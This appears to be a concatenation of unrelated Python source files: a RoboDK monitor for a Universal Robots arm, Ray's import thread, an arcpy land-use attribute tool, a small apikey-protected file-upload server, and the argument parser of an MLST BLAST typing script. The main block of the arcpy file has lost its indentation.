    #ROBOT_CURRENT = packet_value(packet, UR_GET_JOINT_CURRENTS)
    #print(ROBOT_JOINTS)
# Monitor thread to retrieve information from the robot
def UR_Monitor():
    """Connect to the robot state port, feed every complete packet to
    on_packet, and reconnect if the connection drops.

    Fix: the original never detected a closed connection — recv()
    returning b'' left the inner loop spinning forever, and both the
    socket close and the reconnect in the outer loop were unreachable.
    An empty recv now breaks out so the outer loop can reconnect.
    """
    while True:
        rt_socket = socket.create_connection((ROBOT_IP, ROBOT_PORT))
        buf = b''
        packet_count = 0
        packet_time_last = time.time()
        while True:
            more = rt_socket.recv(4096)
            if not more:
                # Peer closed the connection: reconnect via the outer loop.
                break
            buf = buf + more
            if packet_check(buf):
                packet_len = packet_size(buf)
                packet, buf = buf[:packet_len], buf[packet_len:]
                on_packet(packet)
                packet_count += 1
                # Report throughput roughly every 125 packets.
                if packet_count % 125 == 0:
                    t_now = time.time()
                    print("Monitoring at %.1f packets per second" % (packet_count / (t_now - packet_time_last)))
                    packet_count = 0
                    packet_time_last = t_now
        rt_socket.close()
#########################################################################
# Enter RoboDK IP and Port
ROBOT_IP = None #'192.168.2.31'
ROBOT_PORT = 30003
# Start RoboDK API
RDK = Robolink()
# Retrieve a robot
robot = RDK.ItemUserPick('Select a UR robot to retrieve current position', ITEM_TYPE_ROBOT)
if not robot.Valid():
    quit()
# Retrieve Robot's IP:
if ROBOT_IP is None:
    ip, port, path, ftpuser, ftppass = robot.ConnectionParams()
    ROBOT_IP = ip
# Shared state written by the monitor thread, read by the loop below.
ROBOT_JOINTS = None
last_joints_target = None
last_joints_refresh = None
# Start the Robot Monitor thread
#q = queue.Queue()
t = threading.Thread(target=UR_Monitor)
t.daemon = True
t.start()
#UR_Monitor()
# Start the main loop to refresh RoboDK and create targets/programs automatically
target_count = 0
while True:
    # Wait for a valid robot joints reading
    # NOTE(review): this spins without sleeping until the monitor thread
    # publishes the first reading — consider pausing here too.
    if ROBOT_JOINTS is None:
        continue
    # Set the robot to that position
    if Robot_Joints_Check(last_joints_refresh, ROBOT_JOINTS, TOLERANCE_JOINTS_REFRESH):
        last_joints_refresh = ROBOT_JOINTS
        robot.setJoints(ROBOT_JOINTS)
    # Stop here if we need only the current position
    if RETRIEVE_JOINTS_ONCE:
        quit(0)
    # Check if the robot has moved enough to create a new target
    if CREATE_TARGETS and Robot_Joints_Check(last_joints_target, ROBOT_JOINTS, TOLERANCE_JOINTS_NEWTARGET):
        last_joints_target = ROBOT_JOINTS
        target_count = target_count + 1
        newtarget = RDK.AddTarget('T %i' % target_count, 0, robot)
    # Take a short break
    pause(REFRESH_RATE)
|
import_thread.py | from collections import defaultdict
import threading
import traceback
import redis
import grpc
import ray
from ray import ray_constants
from ray import cloudpickle as pickle
import ray._private.profiling as profiling
import logging
logger = logging.getLogger(__name__)
class ImportThread:
    """A thread used to import exports from the driver or other workers.

    Attributes:
        worker: the worker object in this process.
        mode: worker mode
        redis_client: the redis client used to query exports.
        threads_stopped (threading.Event): A threading event used to signal to
            the thread that it should exit.
        imported_collision_identifiers: This is a dictionary mapping collision
            identifiers for the exported remote functions and actor classes to
            the number of times that collision identifier has appeared. This is
            used to provide good error messages when the same function or class
            is exported many times.
    """

    def __init__(self, worker, mode, threads_stopped):
        self.worker = worker
        self.mode = mode
        self.gcs_client = worker.gcs_client
        # Two subscription backends: the newer GCS pubsub path, or a Redis
        # keyspace-notification subscription on this job's export prefix.
        if worker.gcs_pubsub_enabled:
            self.subscriber = worker.gcs_function_key_subscriber
            self.subscriber.subscribe()
        else:
            self.subscriber = worker.redis_client.pubsub()
            self.subscriber.subscribe(
                b"__keyspace@0__:" + ray._private.function_manager.
                make_exports_prefix(self.worker.current_job_id))
        self.threads_stopped = threads_stopped
        self.imported_collision_identifiers = defaultdict(int)
        # Keep track of the number of imports that we've imported.
        self.num_imported = 0

    def start(self):
        """Start the import thread."""
        self.t = threading.Thread(target=self._run, name="ray_import_thread")
        # Making the thread a daemon causes it to exit
        # when the main thread exits.
        self.t.daemon = True
        self.t.start()

    def join_import_thread(self):
        """Wait for the thread to exit."""
        self.t.join()

    def _run(self):
        """Main loop: import pending exports, then wait for notifications."""
        try:
            # Drain anything already exported before we started listening.
            self._do_importing()
            while True:
                # Exit if we received a signal that we should stop.
                if self.threads_stopped.is_set():
                    return
                if self.worker.gcs_pubsub_enabled:
                    key = self.subscriber.poll()
                    if key is None:
                        # subscriber has closed.
                        break
                else:
                    msg = self.subscriber.get_message()
                    if msg is None:
                        # Nothing pending; nap briefly (also wakes early if
                        # threads_stopped is set).
                        self.threads_stopped.wait(timeout=0.01)
                        continue
                    if msg["type"] == "subscribe":
                        # Subscription-confirmation message, not an export.
                        continue
                self._do_importing()
        except (OSError, redis.exceptions.ConnectionError, grpc.RpcError) as e:
            logger.error(f"ImportThread: {e}")
        finally:
            # Close the Redis / GCS subscriber to avoid leaking file
            # descriptors.
            self.subscriber.close()

    def _do_importing(self):
        """Process export keys sequentially until none are left.

        Export keys are numbered consecutively per job, so we keep fetching
        key num_imported + 1 until the lookup misses.
        """
        while True:
            export_key = ray._private.function_manager.make_export_key(
                self.num_imported + 1, self.worker.current_job_id)
            key = self.gcs_client.internal_kv_get(
                export_key, ray_constants.KV_NAMESPACE_FUNCTION_TABLE)
            if key is not None:
                self._process_key(key)
                self.num_imported += 1
            else:
                break

    def _get_import_info_for_collision_detection(self, key):
        """Retrieve the collision identifier, type, and name of the import.

        Returns None for keys that are neither RemoteFunction nor ActorClass
        (callers only invoke this for those two prefixes).
        """
        if key.startswith(b"RemoteFunction"):
            collision_identifier, function_name = self._internal_kv_multiget(
                key, ["collision_identifier", "function_name"])
            # NOTE(review): function_name is encode()d then decode()d here —
            # presumably it is a str out of the pickled export; verify.
            return (collision_identifier,
                    ray._private.utils.decode(function_name.encode()),
                    "remote function")
        elif key.startswith(b"ActorClass"):
            collision_identifier, class_name = self._internal_kv_multiget(
                key, ["collision_identifier", "class_name"])
            return collision_identifier, ray._private.utils.decode(
                class_name.encode()), "actor"

    def _process_key(self, key):
        """Process the given export key from redis."""
        if self.mode != ray.WORKER_MODE:
            # If the same remote function or actor definition appears to be
            # exported many times, then print a warning. We only issue this
            # warning from the driver so that it is only triggered once instead
            # of many times. TODO(rkn): We may want to push this to the driver
            # through Redis so that it can be displayed in the dashboard more
            # easily.
            if (key.startswith(b"RemoteFunction")
                    or key.startswith(b"ActorClass")):
                collision_identifier, name, import_type = (
                    self._get_import_info_for_collision_detection(key))
                self.imported_collision_identifiers[collision_identifier] += 1
                # Warn exactly once, when the count hits the threshold.
                if (self.imported_collision_identifiers[collision_identifier]
                        == ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD):
                    logger.warning(
                        "The %s '%s' has been exported %s times. It's "
                        "possible that this warning is accidental, but this "
                        "may indicate that the same remote function is being "
                        "defined repeatedly from within many tasks and "
                        "exported to all of the workers. This can be a "
                        "performance issue and can be resolved by defining "
                        "the remote function on the driver instead. See "
                        "https://github.com/ray-project/ray/issues/6240 for "
                        "more discussion.", import_type, name,
                        ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD)
        # Dispatch on the key prefix.
        if key.startswith(b"RemoteFunction:"):
            # TODO (Alex): There's a race condition here if the worker is
            # shutdown before the function finished registering (because core
            # worker's global worker is unset before shutdown and is needed
            # for profiling).
            # with profiling.profile("register_remote_function"):
            (self.worker.function_actor_manager.
             fetch_and_register_remote_function(key))
        elif key.startswith(b"FunctionsToRun:"):
            with profiling.profile("fetch_and_run_function"):
                self.fetch_and_execute_function_to_run(key)
        elif key.startswith(b"ActorClass:"):
            # Keep track of the fact that this actor class has been
            # exported so that we know it is safe to turn this worker
            # into an actor of that class.
            self.worker.function_actor_manager.imported_actor_classes.add(key)
            with self.worker.function_actor_manager.cv:
                # Function manager may be waiting on actor class to be
                # loaded for deserialization, notify it to wake up and
                # check if the actor class it was looking for is loaded
                self.worker.function_actor_manager.cv.notify_all()
        # TODO(rkn): We may need to bring back the case of
        # fetching actor classes here.
        else:
            assert False, "This code should be unreachable."

    def fetch_and_execute_function_to_run(self, key):
        """Run an arbitrary exported function on the worker."""
        (job_id, serialized_function) = self._internal_kv_multiget(
            key, ["job_id", "function"])
        # Drivers (SCRIPT_MODE) record the export but do not execute it here.
        if self.worker.mode == ray.SCRIPT_MODE:
            return
        try:
            # FunctionActorManager may call pickle.loads at the same time.
            # Importing the same module in different threads causes deadlock.
            with self.worker.function_actor_manager.lock:
                # Deserialize the function.
                function = pickle.loads(serialized_function)
            # Run the function.
            function({"worker": self.worker})
        except Exception:
            # If an exception was thrown when the function was run, we record
            # the traceback and notify the scheduler of the failure.
            traceback_str = traceback.format_exc()
            # Log the error message.
            ray._private.utils.push_error_to_driver(
                self.worker,
                ray_constants.FUNCTION_TO_RUN_PUSH_ERROR,
                traceback_str,
                job_id=ray.JobID(job_id))

    def _internal_kv_multiget(self, key, fields):
        """Fetch the pickled record stored at `key` and yield the requested
        fields (missing fields yield None)."""
        vals = self.gcs_client.internal_kv_get(
            key, ray_constants.KV_NAMESPACE_FUNCTION_TABLE)
        if vals is None:
            vals = {}
        else:
            vals = pickle.loads(vals)
        return (vals.get(field) for field in fields)
|
TQ.py | # -*- coding:utf-8 -*-
import arcpy
import os
import shutil
import time
import multiprocessing
def currentTime():
    """Return the current local time as a 'YYYY-MM-DD HH:MM:SS' string."""
    stamp_format = "%Y-%m-%d %H:%M:%S"
    return time.strftime(stamp_format, time.localtime())
# function
# Batch-add the attribute fields required by the Monitor layers of the
# Monitoring change-detection dataset.
# inShp: input parameter of Monitor_AddFields; must be a vector layer
def Monitor_AddFields(inShp):
    """Add each required change-detection field to inShp if it is missing."""
    print inShp
    fields = arcpy.ListFields(inShp)
    Flds = []
    for f in fields:
        Flds.append(f.name)
    print Flds
    print "创建字段。"
    # Only create a field when it is not already present in the layer.
    if "Prj_ID" not in Flds:
        arcpy.AddField_management(inShp, "Prj_ID", "TEXT", "", "", "10")
        arcpy.AddMessage("Add field Prj_ID successfully!")
    if "QSX" not in Flds:
        arcpy.AddField_management(inShp, "QSX", "TEXT", "", "", "10")
        arcpy.AddMessage("Add field QSX successfully!")
    if "HSX" not in Flds:
        arcpy.AddField_management(inShp, "HSX", "TEXT", "", "", "10")
        arcpy.AddMessage("Add field HSX successfully!")
    if "TBLX" not in Flds:
        arcpy.AddField_management(inShp, "TBLX", "TEXT", "", "", "4")
        arcpy.AddMessage("Add field TBLX successfully!")
    if "BZ" not in Flds:
        arcpy.AddField_management(inShp, "BZ", "TEXT", "", "", "50")
        arcpy.AddMessage("Add field BZ successfully!")
    if "TBMJ" not in Flds:
        # TBMJ is numeric: FLOAT with precision 8, scale 2.
        arcpy.AddField_management(inShp, "TBMJ", "FLOAT", 8, 2)
        arcpy.AddMessage("Add field TBMJ successfully!")
    if "Dist_Name" not in Flds:
        arcpy.AddField_management(inShp, "Dist_Name", "TEXT", "", "", "50")
        arcpy.AddMessage("Add field Dist_Name successfully!")
    if "Dist_Code" not in Flds:
        arcpy.AddField_management(inShp, "Dist_Code", "TEXT", "", "", "6")
        arcpy.AddMessage("Add field Dist_Code successfully!")
    if "Unique_Cod" not in Flds:
        # "Unique_Cod" is the truncated spelling used as the actual field
        # name (likely due to the 10-character field-name limit of
        # shapefiles); the message reports the intended full name.
        arcpy.AddField_management(inShp, "Unique_Cod", "TEXT", "", "", "25")
        arcpy.AddMessage("Add field Unique_Code successfully!")
# function
# Batch-add the attribute fields required by the Landuse dataset.
# inShp: input parameter of Landuse_AddFields; must be a vector layer
def Landuse_AddFields(inShp):
    """Add the Landuse import fields to inShp, one by one.

    Each AddField call is wrapped in try/except because arcpy raises when
    the field already exists; in that case a notice is emitted instead.
    """
    print("创建字段。")
    # (field name, text length) pairs, in the original creation order.
    field_specs = [
        ("Prj_ID", "10"),
        ("Phase", "10"),
        ("ID_src", "4"),
        ("Name_src", "50"),
        ("ID_db", "4"),
        ("Name_db", "50"),
        ("Image_src", "50"),
        ("Dist_Code", "6"),
        ("Unique_Cod", "25"),
    ]
    for field_name, field_length in field_specs:
        try:
            arcpy.AddField_management(inShp, field_name, "TEXT", "", "", field_length)
            # Bug fix: the original copy-pasted block reported "Dist_Code"
            # in both messages for the Unique_Cod field; messages now name
            # the field actually being added.
            arcpy.AddMessage("Add field %s successfully!" % field_name)
        except IOError:
            arcpy.AddMessage("already have the field:%s" % field_name)
    arcpy.AddMessage("Add fields finished!")
    print("finish")
def Image_src_sde(landuse, image):
    """SDE variant of Image_src: stamp each landuse feature intersecting an
    image footprint (and belonging to project 15.A90) with the image name,
    then derive Phase from characters 13-21 of Image_src."""
    icursor = arcpy.SearchCursor(image)
    arcpy.MakeFeatureLayer_management(image, "imlyr")
    arcpy.MakeFeatureLayer_management(landuse, "lulyr")
    for row in icursor:
        # One pass per image footprint, keyed by its Name attribute.
        gpid = row.getValue("Name")
        # print gpid
        gpidV = '"' + gpid + '"'
        # print gpidV
        express = '"Name" =' + "'" + gpid + "'"
        print express
        arcpy.SelectLayerByAttribute_management("imlyr", "NEW_SELECTION", express)
        # Select landuse features intersecting this footprint, then narrow
        # to the hard-coded project "15.A90".
        arcpy.SelectLayerByLocation_management("lulyr", "INTERSECT", "imlyr","","NEW_SELECTION")
        arcpy.SelectLayerByAttribute_management("lulyr", "SUBSET_SELECTION", "\"PRJ_ID\" = '15.A90'")
        arcpy.CalculateField_management("lulyr", "IMAGE_SRC", gpidV, "PYTHON_9.3", "")
        arcpy.CalculateField_management("lulyr", "Phase", "!Image_src![13:21]", "PYTHON_9.3", "")
        arcpy.SelectLayerByAttribute_management("imlyr", "CLEAR_SELECTION")
        arcpy.SelectLayerByAttribute_management("lulyr", "CLEAR_SELECTION")
    arcpy.Delete_management("imlyr")
    arcpy.Delete_management("lulyr")
# function
# Image_src computes the "Image_src" field of the input landuse layer.
# landuse: a layer from the Landuse dataset; must be a vector layer.
# image: the vector footprint of the imagery; its attribute table holds a
#        "Name" field with the image name. Must be a vector layer.
def Image_src(landuse, image):
    """Tag each landuse feature with the name of the image footprint that
    contains the feature's centroid (HAVE_THEIR_CENTER_IN)."""
    icursor = arcpy.SearchCursor(image)
    arcpy.MakeFeatureLayer_management(image, "imlyr")
    arcpy.MakeFeatureLayer_management(landuse, "lulyr")
    for row in icursor:
        gpid = row.getValue("Name")
        # print gpid
        gpidV = '"' + gpid + '"'
        # print gpidV
        express = '"Name" =' + "'" + gpid + "'"
        print currentTime(),"-",express
        arcpy.SelectLayerByAttribute_management("imlyr", "NEW_SELECTION", express)
        arcpy.SelectLayerByLocation_management("lulyr", "HAVE_THEIR_CENTER_IN", "imlyr")
        arcpy.CalculateField_management("lulyr", "Image_src", gpidV, "PYTHON_9.3", "")
        # arcpy.CalculateField_management("lulyr", "Phase", "!Image_src![13:21]", "PYTHON_9.3", "") # Mid( [IMAGE_SRC],13,4 )+"-"+Mid( [IMAGE_SRC],17,2 )+"-"+Mid( [IMAGE_SRC],19,2 )
        arcpy.SelectLayerByAttribute_management("imlyr", "CLEAR_SELECTION")
        arcpy.SelectLayerByAttribute_management("lulyr", "CLEAR_SELECTION")
    # arcpy.Delete_management("imlyr")
    # arcpy.Delete_management("lulyr")
# function
# Phase computes the "Phase" field of the landuse layer from Image_src.
# landuse: a layer from the Landuse dataset; must be a vector layer.
# "!Image_src![13:21]" slices characters 13-21 of the Image_src value;
# adjust the bounds if the image naming convention changes.
def Phase(landuse):
    layer_name = "lulyr"
    arcpy.MakeFeatureLayer_management(landuse, layer_name)
    calc_expression = "!Image_src![13:21]"
    arcpy.CalculateField_management(layer_name, "Phase", calc_expression, "PYTHON_9.3", "")
def UniqueCode_new(landuse,intufu):
    """Number the landuse features sheet by sheet: for every 1:10000 map
    sheet in intufu, select the landuse features whose centroid falls in
    the sheet and write a 6-digit zero-padded sequence number into
    Unique_Cod (this variant writes only the sequence number, without the
    086/Dist_Code/sheet prefix used by UniqueCode)."""
    tufu_count = arcpy.GetCount_management(intufu)
    arcpy.MakeFeatureLayer_management(landuse, "dikuai_lyr")
    arcpy.MakeFeatureLayer_management(intufu, "intufulyr")
    curs = arcpy.SearchCursor(intufu)
    j = 1
    for row in curs:
        # NUMBER = row[0]
        # shp = row[1]
        gpid = row.getValue("NUMBER_1W")
        # print gpid
        gpidV = '"' + gpid + '"'
        # print gpidV
        express = '"NUMBER_1W" =' + "'" + gpid + "'"
        # print currentTime(),"-",express
        try:
            # Select this sheet, then the landuse features centred in it.
            arcpy.SelectLayerByAttribute_management("intufulyr", "NEW_SELECTION", express)
            arcpy.SelectLayerByLocation_management("dikuai_lyr", "HAVE_THEIR_CENTER_IN", "intufulyr", "", "NEW_SELECTION")
            count = int(arcpy.GetCount_management("dikuai_lyr").getOutput(0))
            print time.strftime("%Y-%m-%d %H:%M:%S",time.localtime()), ":", gpid, ":", str(j), "/", tufu_count, "---", count
            if count > 0:
                i = 1
                u_cur = arcpy.da.UpdateCursor("dikuai_lyr", ["Unique_Cod", "Dist_Code"])
                for u_row in u_cur:
                    # if u_row[0] is None:
                    # Cal_Value = "086" + str(u_row[1]) + gpid
                    # Left-pad the running number i to 6 digits.
                    if i <= 9 and i <= count:
                        u_row[0] = "0" * 5 + str(i)
                    elif i <= 99 and i <= count:
                        u_row[0] = "0" * 4 + str(i)
                    elif i <= 999 and i <= count:
                        u_row[0] = "0" * 3 + str(i)
                    elif i <= 9999 and i <= count:
                        u_row[0] = "0" * 2 + str(i)
                    elif i <= 99999 and i <= count:
                        u_row[0] = "0" * 1 + str(i)
                    elif i <= 999999 and i <= count:
                        u_row[0] = "0" * 0 + str(i)
                    i = i + 1
                    u_cur.updateRow(u_row)
            arcpy.SelectLayerByAttribute_management("dikuai_lyr", "CLEAR_SELECTION")
            arcpy.SelectLayerByAttribute_management("intufulyr", "CLEAR_SELECTION")
            j = j + 1
        except IOError, e:
            # Geometry/topology failures for one sheet are reported and the
            # remaining sheets are still processed.
            print "TopoEngine Error", gpid
# function
# UniqueCode fills the "Unique_Code" field of the landuse layer.
# landuse: a layer from the Landuse dataset; must be a vector layer, and its
#          "Dist_Code" field must already be populated.
# intufu: the 1:10000 map-sheet (tile) grid layer.
def UniqueCode(landuse,intufu):
    """Write a globally unique code per feature: "086" + Dist_Code + sheet
    number + 6-digit zero-padded sequence number within the sheet."""
    tufu_count = arcpy.GetCount_management(intufu)
    arcpy.MakeFeatureLayer_management(landuse, "dikuai_lyr")
    arcpy.MakeFeatureLayer_management(intufu, "intufulyr")
    curs = arcpy.SearchCursor(intufu)
    j = 1
    for row in curs:
        # NUMBER = row[0]
        # shp = row[1]
        gpid = row.getValue("NUMBER_1W")
        # print gpid
        gpidV = '"' + gpid + '"'
        # print gpidV
        express = '"NUMBER_1W" =' + "'" + gpid + "'"
        # print currentTime(),"-",express
        try:
            # Select this sheet, then the landuse features centred in it.
            arcpy.SelectLayerByAttribute_management("intufulyr", "NEW_SELECTION", express)
            arcpy.SelectLayerByLocation_management("dikuai_lyr", "HAVE_THEIR_CENTER_IN", "intufulyr", "", "NEW_SELECTION")
            count = int(arcpy.GetCount_management("dikuai_lyr").getOutput(0))
            print time.strftime("%Y-%m-%d %H:%M:%S",time.localtime()), ":", gpid, ":", str(j), "/", tufu_count, "---", count
            if count > 0:
                i = 1
                u_cur = arcpy.da.UpdateCursor("dikuai_lyr", ["Unique_Cod", "Dist_Code"])
                for u_row in u_cur:
                    # if u_row[0] is None:
                    # Prefix: country code 086 + district code + sheet number.
                    Cal_Value = "086" + str(u_row[1]) + gpid
                    # Append the running number i, left-padded to 6 digits.
                    if i <= 9 and i <= count:
                        u_row[0] = Cal_Value + "0" * 5 + str(i)
                    elif i <= 99 and i <= count:
                        u_row[0] = Cal_Value + "0" * 4 + str(i)
                    elif i <= 999 and i <= count:
                        u_row[0] = Cal_Value + "0" * 3 + str(i)
                    elif i <= 9999 and i <= count:
                        u_row[0] = Cal_Value + "0" * 2 + str(i)
                    elif i <= 99999 and i <= count:
                        u_row[0] = Cal_Value + "0" * 1 + str(i)
                    elif i <= 999999 and i <= count:
                        u_row[0] = Cal_Value + "0" * 0 + str(i)
                    i = i + 1
                    u_cur.updateRow(u_row)
            arcpy.SelectLayerByAttribute_management("dikuai_lyr", "CLEAR_SELECTION")
            arcpy.SelectLayerByAttribute_management("intufulyr", "CLEAR_SELECTION")
            j = j + 1
        except IOError, e:
            # Geometry/topology failures for one sheet are reported and the
            # remaining sheets are still processed.
            print "TopoEngine Error", gpid
# function
# srcFields2dbFields converts ID_src/Name_src into ID_db/Name_db according
# to the vector warehouse classification scheme. Adjust the mapping below
# if the source classes change.
# landuse: input parameter of srcFields2dbFields.
def srcFields2dbFields(landuse):
    # Source code -> (database code, database name). Codes '800' and '900'
    # both collapse into the "other land" class.
    code_map = {
        '100': ('100', '耕地'),
        '200': ('200', '园地'),
        '300': ('300', '林地'),
        '400': ('400', '草地'),
        '600': ('500', '城乡建设用地'),
        '700': ('600', '交通运输用地'),
        '500': ('700', '水域及水利设施用地'),
        '800': ('800', '其他土地'),
        '900': ('800', '其他土地'),
    }
    icursor = arcpy.UpdateCursor(landuse)
    for row in icursor:
        src_code = str(row.getValue("ID_src"))
        if src_code in code_map:
            db_code, db_name = code_map[src_code]
            row.setValue("ID_db", db_code)
            row.setValue("Name_db", db_name)
        # Every row is written back, matched or not (as in the original).
        icursor.updateRow(row)
    del icursor, row
def Copy_children2Parent(root,target):
    """Walk every subdirectory of root and copy the files found into target.

    NOTE(review): the existence check looks in `root`, not in `target` —
    presumably the intent was to skip files already present in the
    destination; verify before relying on it.
    """
    for parent, dirnames, filenames in os.walk(root):
        for file in filenames:
            img_path = os.path.join(parent, file)
            if not os.path.exists(os.path.join(root,file)) :
                print currentTime(),os.path.basename(img_path)
                shutil.copy(img_path, target)
            else:
                print currentTime(),os.path.basename(img_path),"already exists in ", target
if __name__ == "__main__":
# landuse = r"D:\Chenjl_Data\矢量入库原始数据\26上海农普\一类测量\YLDCTB310000.shp"
# intufu = r"C:\Users\Administrator\Documents\ArcGIS\Default.gdb\Export_Output1b1w"
# UniqueCode(landuse, intufu)
landuse = r"C:\test\四川landuse.shp"
image = r"C:\test\四川landuse_fenfu.shp"
# p = multiprocessing.Process(target=UniqueCode,args=(landuse, image))
# p.start()
# print p.pid
UniqueCode_new(landuse, image) |
main.py | #!/usr/bin/python3
from http.server import HTTPServer, BaseHTTPRequestHandler
import sys, os, datetime, re, urllib, shutil
import socket
import socketserver
import threading
os.chdir(os.path.dirname(__file__) or '.') # CD to this directory
from helpers import *
import mimeLib
# Module-wide settings: socket/file chunk size, parsed config.ini, and the
# whitelist of local files the server may serve directly.
_statics = {
    'buffer_size': 4096,
    'config': read_ini('config.ini'),
    'allowed_paths': [
        'index.html'
    ]
}
def initdirs():
    """Create the storage folder from config.ini if it does not exist.

    (The original defined an `md` lambda alias and an unused `cf`
    file-touch helper; both were dead weight and have been removed.)
    """
    os.makedirs(_statics['config']['folder'], exist_ok=True)
initdirs()
class MyServer(BaseHTTPRequestHandler):
    """Handler for a small apikey-protected file-store service.

    Paths beginning with '/~' are API calls whose variables (apikey,
    action, file, name) are parsed by helpers.urlvar; any other path is
    served from the working directory, but only if it is listed in
    _statics['allowed_paths'].
    """

    def do_GET(self):
        """Serve API reads (get_list / get_file) and whitelisted local files."""
        if self.path == '/':
            self.path = '/index.html'
        path = recover(self.path)
        v = urlvar(path)
        if len(path) >= 2:
            if path[0:2] == '/~':
                # API route: every action requires the configured apikey.
                if v['apikey'] != _statics['config']['apikey']:
                    self.send_response(403)
                    self.send_header('Content-Type', mimeLib.getmime('*.txt'))
                    self.end_headers()
                    self.wfile.write(b'Forbidden')
                    return
                if v['action'] == 'get_list':
                    # Newline-separated listing of the stored files.
                    self.send_response(200)
                    self.send_header('Content-Type', mimeLib.getmime('*.txt'))
                    self.end_headers()
                    self.wfile.write('\n'.join(os.listdir(_statics['config']['folder'])).encode('utf-8'))
                    return
                elif v['action'] == 'get_file':
                    folder = _statics['config']['folder']
                    filepath = folder + v['file']
                    # Security fix: refuse names (e.g. '../secret') that
                    # resolve outside the storage folder (path traversal).
                    safe = os.path.normpath(filepath).startswith(
                        os.path.normpath(folder) + os.sep)
                    if safe and os.path.exists(filepath):
                        self.send_response(200)
                        self.send_header('Content-Type', mimeLib.getmime(filepath))
                        # self.send_header('Cache-Control', 'public, max-age=86400')
                        self.end_headers()
                        # Stream the file in fixed-size chunks.
                        with open(filepath, 'rb') as f:
                            while True:
                                data = f.read(_statics['buffer_size'])
                                if not data:
                                    break
                                self.wfile.write(data)
                        return
                    else:
                        self.send_response(404)
                        self.send_header('Content-Type', mimeLib.getmime('*.html'))
                        self.end_headers()
                        self.wfile.write(b'Not Found')
                        return
            else:
                # Local file: only explicitly whitelisted names are served.
                path = path[1:]
                if os.path.exists(path) and path in _statics['allowed_paths']:
                    self.send_response(200)
                    self.send_header('Content-Type', mimeLib.getmime(path))
                    # self.send_header('Cache-Control', 'public, max-age=86400')
                    self.end_headers()
                    with open(path, 'rb') as f:
                        while True:
                            data = f.read(_statics['buffer_size'])
                            if not data:
                                break
                            self.wfile.write(data)
                    return
                else:
                    self.send_response(404)
                    self.send_header('Content-Type', mimeLib.getmime('*.html'))
                    self.end_headers()
                    self.wfile.write(b'Not Found')
                    return

    def do_POST(self):
        """Handle the 'upload' API action: append the request body to the
        named file inside the storage folder."""
        if self.path == '/':
            self.path = '/index.html'
        path = recover(self.path)
        v = urlvar(path)
        if len(path) >= 2:
            if path[0:2] == '/~':
                if v['apikey'] != _statics['config']['apikey']:
                    self.send_response(403)
                    self.send_header('Content-Type', mimeLib.getmime('*.txt'))
                    self.end_headers()
                    self.wfile.write(b'Forbidden')
                    return
                elif v['action'] == 'upload':
                    store_path = _statics['config']['folder']
                    store_name = v['name']
                    # Security fix: refuse upload names that resolve outside
                    # the storage folder (e.g. '../evil').
                    dest = os.path.normpath(os.path.join(store_path, store_name))
                    if not dest.startswith(os.path.normpath(store_path) + os.sep):
                        self.send_response(403)
                        self.send_header('Content-Type', mimeLib.getmime('*.txt'))
                        self.end_headers()
                        self.wfile.write(b'Forbidden')
                        return
                    self.send_response(200)
                    self.send_header('Content-Type', mimeLib.getmime('*.txt'))
                    self.end_headers()
                    os.makedirs(store_path, exist_ok=True)
                    content_length = int(self.headers['Content-Length'])
                    read_bytes = 0
                    # Append the body to the destination file in chunks.
                    with open(store_path + store_name, 'ab', buffering=_statics['buffer_size']) as f:
                        while read_bytes < content_length:
                            data = self.rfile.read(min(_statics['buffer_size'], content_length - read_bytes))
                            if not data:
                                # Client closed the connection early; stop
                                # instead of spinning on empty reads.
                                break
                            f.write(data)
                            # Bug fix: count the bytes actually read, not the
                            # buffer size, so short reads are accounted for.
                            read_bytes += len(data)
                    self.wfile.write(b'OK')
class ThreadedHTTPServer(socketserver.ThreadingMixIn, HTTPServer):
    """HTTPServer that handles each incoming request in its own thread
    (behaviour provided entirely by socketserver.ThreadingMixIn)."""
if __name__ == '__main__':
    conf = _statics['config']
    address, port = conf['address'], int(conf['port'])
    server = ThreadedHTTPServer((address, port), MyServer)
    print('Starting server on address %s, port %s...' % (address, port))
    try:
        # Bug fix: the original started serve_forever() in a daemon helper
        # thread AND called it again on the main thread, so two threads
        # polled the same server. ThreadingMixIn already spawns one thread
        # per request; a single serve_forever() here is sufficient.
        server.serve_forever()
    except KeyboardInterrupt:
        # Ctrl-C: release the listening socket and exit quietly.
        server.server_close()
|
mMLST.py | #! /usr/env/python
__author__ = 'mikeknowles, akoziol'
""" Includes threading found in examples:
http://www.troyfawkes.com/learn-python-multithreading-queues-basics/
http://www.ibm.com/developerworks/aix/library/au-threadingpython/
https://docs.python.org/2/library/threading.html
Revised with speed improvements
"""
from Bio.Blast.Applications import NcbiblastnCommandline
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.Blast import NCBIXML
from threading import Thread
from Queue import Queue
from collections import defaultdict
from cStringIO import StringIO
from glob import glob
import subprocess, os, time, sys, shlex, re, threading, json, errno, operator
from argparse import ArgumentParser
# Command-line interface.
# NOTE: argparse %-formats help strings, so a literal percent sign must be
# escaped as '%%'; the original '98%)' raised ValueError whenever --help ran.
parser = ArgumentParser(description='Performs blast analyses to determine presence of alleles in a genome query, and '
                                    'types genome based on typing profile. Adds novel alleles and profiles to the '
                                    'appropriate files. '
                                    'Example command: '
                                    '-p /home/blais/PycharmProjects/MLST '
                                    '-s /home/blais/PycharmProjects/MLST/sequences '
                                    '-O /home/blais/PycharmProjects/MLST/Organism '
                                    '-o Vibrio '
                                    '-S MLST')
parser.add_argument('-p', '--path', required=True,
                    # default='/home/blais/PycharmProjects/pythonGeneSeekr/',
                    help='Specify path for custom folder locations. If you don\'t supply additional paths'
                         'e.g. sequencePath, allelePath, or organismPath, then the program will look for '
                         'MLST files in .../path/Organism, and the query sequences in ../path/sequences')
parser.add_argument('-c', '--cutoff', required=False, default=98,
                    help='The percent identity cutoff value for BLAST matches. Default is 98%%')
parser.add_argument('-s', '--sequencePath', required=False,
                    default='/home/blais/PycharmProjects/MLST/sequences',
                    help='The location of the query sequence files')
parser.add_argument('-a', '--alleleProfilePath', required=False,
                    # default='/home/blais/PycharmProjects/pythonGeneSeekr/Organism/Salmonella/cgMLST',
                    help='The path of the folder containing the two folders containing '
                         'the allele files, and the profile file e.g. /path/to/folder/Organism/Salmonella/cgMLST'
                         'Please note the requirements for the profile database in the readme')
parser.add_argument('-O', '--organismPath', required=False,
                    help='The path of the folder containing the organism folders e.g. /path/to/folder/Organism')
parser.add_argument('-o', '--organism', required=False,
                    help='The name of the organism you wish to type. Must match the folder name containing the schemes'
                         'e.g. Salmonella')
